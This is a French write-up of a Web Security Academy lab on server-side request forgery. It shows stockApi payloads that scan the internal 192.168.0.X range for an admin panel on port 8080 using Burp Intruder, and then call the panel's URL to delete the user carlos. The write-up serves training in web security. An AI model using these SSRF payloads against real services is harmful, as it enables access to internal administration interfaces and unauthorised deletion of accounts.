SSRF de base contre système interne

Basic SSRF against another back-end system

Lab: Basic SSRF against another back-end system | Web Security AcademyWebSecAcademy

Ce laboratoire propose une fonctionnalité de vérification de stock qui interroge un service interne. L’objectif est d’utiliser ce mécanisme pour analyser la plage interne 192.168.0.X à la recherche d’une interface d’administration sur le port 8080, puis de supprimer l’utilisateur carlos.

Analyse et exploitation

On envoie le paramètre stockApi à Intruder afin d’automatiser le test d’adresses internes :

stockApi=http://192.168.0.§1§:8080/admin

On effectue une attaque par force brute sur les 254 adresses possibles de la plage interne, toutes avec la route /admin.

On télécharge un dictionnaire de valeurs pour alimenter l’attaque :

wget https://gist.githubusercontent.com/danielthall/09b8f173b5c0b84065d8e211def83c0b/raw/20d713765b3fa620c09aebd36e41ce69debef865/0-1000.txt

Après lancement de l’attaque, l’adresse 192.168.0.14 renvoie un code HTTP 200, indiquant que l’interface admin est accessible.

Suppression de l’utilisateur

Accès au panneau d’administration :

stockApi=http://192.168.0.14:8080/admin
stockApi=http://192.168.0.14:8080/admin/delete?username=carlos

Mis à jour il y a 3 mois

hashtagBasic SSRF against another back-end system

hashtagAnalyse et exploitation

hashtagSuppression de l’utilisateur

Basic SSRF against another back-end system

Analyse et exploitation

Suppression de l’utilisateur